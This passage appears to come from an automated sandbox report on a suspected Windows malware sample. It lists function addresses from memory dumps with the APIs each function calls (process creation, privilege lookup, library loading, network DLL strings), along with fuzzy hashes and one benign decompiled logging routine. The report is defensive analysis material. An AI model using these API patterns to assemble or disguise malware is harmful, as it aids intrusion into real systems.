                                                                        • Instruction Fuzzy Hash: 95318CB1602704ABC711DFA8D9A1FA7B7B8AB88710F00851DF61AAB281D734B545CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B6EE6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 009B6F98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: 108b9dd5b509ce18fe40e5c959be0497746d8aad8f3d052cd844921e79716183
                                                                        • Instruction ID: 41e86cc7dc05ac956ec24c99a5c8647f327777f4b541094099e728ed9da80674
                                                                        • Opcode Fuzzy Hash: 108b9dd5b509ce18fe40e5c959be0497746d8aad8f3d052cd844921e79716183
                                                                        • Instruction Fuzzy Hash: CD21ACB1601704ABD711DFA4C9A1BAAB7B8BB88710F04802DF619AB281D374B445CBE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B84D4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009A3B93), ref: 009B850D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                        • Instruction ID: c9c52dbb8b9a59610f43621a806d8808fb10d3e2ae4e30d270f44d54ac3bd8c0
                                                                        • Opcode Fuzzy Hash: e641709b8896f5aac4485ac3c5df57708f99eaa19733368f4537f06727c84e07
                                                                        • Instruction Fuzzy Hash: 71E0D8AC2442851BDB04EE69E5908E73795FFC5354714994AEC9987307C534D8168BB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B84E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009A3B93), ref: 009B850D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 4288ce8e8f1dbeaae7f6180f2349870038cb0e1db1a34383add418fdc904d703
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: 43E01AB12002086BD714DF59CC45EA777ACAF88750F014555B90857281C630E910CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009A7270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009A72CA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009A72EB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                        • Instruction ID: 097cc16b36a98d2d62647707e58afe610a5e775d42b72c45d8438dacd115b826
                                                                        • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                                                        • Instruction Fuzzy Hash: 9F01A231A8022877F720A6D49C03FFEB76C6B81F51F154519FF04BA1C1E6A46A0686F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009A9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 009A9BA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: 35b6ca591c514f93bed8e07f8d76a57e757d096ec32f576122726d9b54e42e83
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: 3E011EB5D0020DBBDF10DAA4ED42FDEB7B8AB54318F004195E91997281F671EB14CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8675, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,009ACFB2,009ACFB2,?,00000000,?,?), ref: 009B8670
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                        • Instruction ID: 558029ff33dd982335f5f85dc39efe0e12c53711573a3c849cbb44d722e97734
                                                                        • Opcode Fuzzy Hash: b95dca177bc3e0b334d8870d58869377c2e54386ebba5061efa66b41deb5e64a
                                                                        • Instruction Fuzzy Hash: F70162B26042546FDB24DF65DC89FEB7B6CEF89320F144599F98D57282C930E815C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B854E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009B85A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                        • Instruction ID: f617655308389715f801b9f823470fdef64de4f58f15d332f22d38e39011125a
                                                                        • Opcode Fuzzy Hash: 8967850bb2fc1f34c19b83c00b9e08fe12e6c6e2fedc569ce408f917b69c990d
                                                                        • Instruction Fuzzy Hash: 37019DB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009B85A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: 797e1c0ca072ce0b8015c2effdefa390fc88b1acd7eba77d3c22eea471b897cc
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: 3A015FB2214108ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B7020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,009ACCE0,?,?), ref: 009B705C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction ID: 32d56ca0bbbd0833a43e6ed31d3bda1e59a686dda861916fa40e23692d23d25d
                                                                        • Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
                                                                        • Instruction Fuzzy Hash: 12E06D333812043AE230659DAC02FE7B29C8BC1B30F14002AFA0DEA2C1D595F80142A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B84A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(009B3526,?,009B3C9F,009B3C9F,?,009B3526,?,?,?,?,?,00000000,00000000,?), ref: 009B84CD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 6da8f5ec3e81000c756fab535e94b242e9a61605a5d53203b3c10685e9f3dc7e
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: E7E012B1200208ABDB14EF99CC41EA777ACAF88660F118559BA085B282CA30F910CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,009ACFB2,009ACFB2,?,00000000,?,?), ref: 009B8670
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: eb885f2e1e7909df8320fb2468f4982b9bfd95ebcf4e034d8bc380feb6f7d65f
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: 30E01AB12002086BDB10DF49CC85FE737ADAF88650F018555BA0857281C930E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009B8642, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,009ACFB2,009ACFB2,?,00000000,?,?), ref: 009B8670
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                        • Instruction ID: f813ee13f75f8b2f251f734a33561073b38802cb49d230be3d948a12f69adb41
                                                                        • Opcode Fuzzy Hash: b86ce0f69160b41f642dc728448cc3b703696c3d4e65d99745e67c76f72a3c12
                                                                        • Instruction Fuzzy Hash: 1BE04FB12002086FDB10DF54CC84FE73769EF88350F018555F90C97281C931E811CBB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 009AD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,009A7C73,?), ref: 009AD44B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 52aa333bc31bf011fbe3022250db69e869fca98ee3f9aee08c1c2150c32e9486
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 2ED0A7717503043BE610FAA49C03F6672CC5B89F10F494074F94DD73C3D964F5004161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04C9967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
                                                                        • Instruction ID: ca7915b08c01192e267c772392607ee56a8e1d5623cee07a07fba845d1ea4181
                                                                        • Opcode Fuzzy Hash: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
                                                                        • Instruction Fuzzy Hash: 75B02BF18010C2D5FB00D760060C7173A1277C0308F22C051D1030280A0738D090F1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 04CEFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E04CEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04CE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04CE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x04cefdda
                                                                        0x04cefde2
                                                                        0x04cefde5
                                                                        0x04cefdec
                                                                        0x04cefdfa
                                                                        0x04cefdff
                                                                        0x04cefe0a
                                                                        0x04cefe0f
                                                                        0x04cefe17
                                                                        0x04cefe1e
                                                                        0x04cefe19
                                                                        0x04cefe19
                                                                        0x04cefe19
                                                                        0x04cefe20
                                                                        0x04cefe21
                                                                        0x04cefe22
                                                                        0x04cefe25
                                                                        0x04cefe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CEFDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CEFE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CEFE2B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.510337881.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true
                                                                        • Associated: 0000000D.00000002.511081583.0000000004D4B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
                                                                        • Instruction ID: 72200b6b1b2b721bf49cd3e87f3f5bd567d2f4d7ad4b847aa784d19894352b88
                                                                        • Opcode Fuzzy Hash: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
                                                                        • Instruction Fuzzy Hash: 4BF0F676200201BFEA201A86DC06F33BB6BEB84774F140358F628561D1EA62FC3096F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%